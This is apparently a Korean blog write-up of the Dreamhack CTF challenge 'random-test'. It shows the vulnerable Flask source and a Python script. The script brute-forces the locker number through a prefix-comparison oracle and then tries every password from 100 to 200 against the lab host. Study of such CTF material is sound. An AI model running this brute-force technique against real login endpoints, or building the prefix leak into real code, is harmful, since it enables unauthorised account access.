๐Ÿ” Security/Web

[드림핵(Dreamhack)] random-test

Rosieblue 2023. 9. 26. 19:07

이런식으로 사물함이랑 자물쇠 비번을 맞춰야하는 문제이다

사물함 번호는 알파벳 소문자 혹은 숫자를 포함하는 4자리 랜덤 문자열이고, 비밀번호는 100 이상 200 이하의 랜덤 정수라고 한다

#!/usr/bin/python3
from flask import Flask, request, render_template
import string
import random

# Flask application object; the "/" route defined below is registered on it.
app = Flask(__name__)

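# Load the flag from disk, falling back to a placeholder when the file cannot
# be read.
try:
    # The context manager closes the handle as soon as the read finishes.
    with open("./flag.txt", "r") as flag_file:
        FLAG = flag_file.read()       # flag is here!
except (OSError, UnicodeError):
    # Only read/decode failures select the placeholder; a bare ``except``
    # would also swallow KeyboardInterrupt and SystemExit.
    FLAG = "[**FLAG**]"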


# Locker number: four characters drawn from lowercase letters and digits.
# NOTE(review): both values are generated once at import time with ``random``,
# which is not a cryptographically secure generator; a real secret would come
# from the ``secrets`` module. The password has only 101 possible values.
alphanumeric = string.ascii_lowercase + string.digits
rand_str = "".join(random.choice(alphanumeric) for _ in range(4))

# Locker password: an integer from 100 to 200 inclusive.
rand_num = random.randint(100, 200)


@app.route("/", methods = ["GET", "POST"])
def index():
    """Render the locker form and check a submitted locker number and password.

    GET returns the empty form. POST reads ``locker_num`` and ``password``
    from the form body and renders ``index.html`` with one of three results:
    "Wrong!", "Good", or "FLAG:" followed by the flag.

    NOTE(review): "Good" is rendered for any non-empty prefix of ``rand_str``,
    so the response reveals how many leading characters are correct, and
    nothing here limits repeated attempts. A hardened check would compare only
    the complete values (for example with ``hmac.compare_digest``), return one
    uniform failure message, and throttle retries.
    """
    if request.method == "GET":
        return render_template("index.html")

    locker_num = request.form.get("locker_num", "")
    password = request.form.get("password", "")

    # Only the first len(locker_num) characters of the secret are compared.
    if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
        # The flag needs the full locker number and the exact password.
        solved = locker_num == rand_str and password == str(rand_num)
        result = "FLAG:" + FLAG if solved else "Good"
    else:
        result = "Wrong!"
    return render_template("index.html", result = result)
            
            
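# Start Flask's built-in server only when this file is executed directly, so
# importing the module (tests, a WSGI server) does not open a listener.
# NOTE(review): host="0.0.0.0" binds every network interface, and app.run()
# is Flask's development server rather than a production WSGI server.
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)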

 

주목해야할 부분은 아래 코드이다

if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:

locker_num๋งŒํผ๋งŒ ๋น„๊ตํ•˜๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ํ•œ ๊ธ€์ž ๋น„๊ต, ~, ๋„ค ๊ธ€์ž ๋น„๊ต ์ด๋Ÿฐ์‹์œผ๋กœ ํ•˜๋ฉด ๋œ๋‹ค

locker_num๋งŒ ๋งž์œผ๋ฉด Good์„ ๋ฐ˜ํ™˜ํ•˜๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค!

 

 

์ฒ˜์Œ์œผ๋กœ requests ๋ชจ๋“ˆ์„ ์ œ๋Œ€๋กœ ์ด์šฉํ•ด๋ดค๋Š”๋ฐ ์ด ๋ฌธ์ œ๋ฅผ ํ†ตํ•ด ์กฐ๊ธˆ ์ต์ˆ™ํ•ด์ง„ ๊ฒƒ ๊ฐ™๋‹ค!

import requests
import string

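# Challenge instance this write-up was solved against.
url = "http://host3.dreamhack.games:16258/"

# Seconds to wait for each response, so a stalled connection cannot hang the run.
TIMEOUT = 10

# Same alphabet the server draws the locker number from.
alphanumeric = string.ascii_lowercase + string.digits

data = {"locker_num": "", "password": ""}
locker_num = ""
password = "100"

# Server-side check being answered:
#   if locker_num != "" and rand_str[0:len(locker_num)] == locker_num:
# A matching prefix is answered with "Good", so each position is confirmed
# before the next one is tried.
for _ in range(4):
    for ch in alphanumeric:
        data["locker_num"] = locker_num + ch
        print(data["locker_num"])
        r = requests.post(url=url, data=data, timeout=TIMEOUT)

        if "Good" in r.text:
            locker_num += ch
            break
    else:
        # No candidate was accepted; going on would build on a wrong prefix.
        raise SystemExit(
            "no matching character for position %d" % (len(locker_num) + 1)
        )
print("Locker_num is", locker_num)

# Use the locker number recovered above rather than a value copied from an
# earlier run: the server picks a new one every time it starts.
data["locker_num"] = locker_num
for candidate in range(100, 201):
    data["password"] = str(candidate)
    r = requests.post(url=url, data=data, timeout=TIMEOUT)
    print(candidate)
    if "FLAG" in r.text:
        password = data["password"]
        print("password is", password)
        break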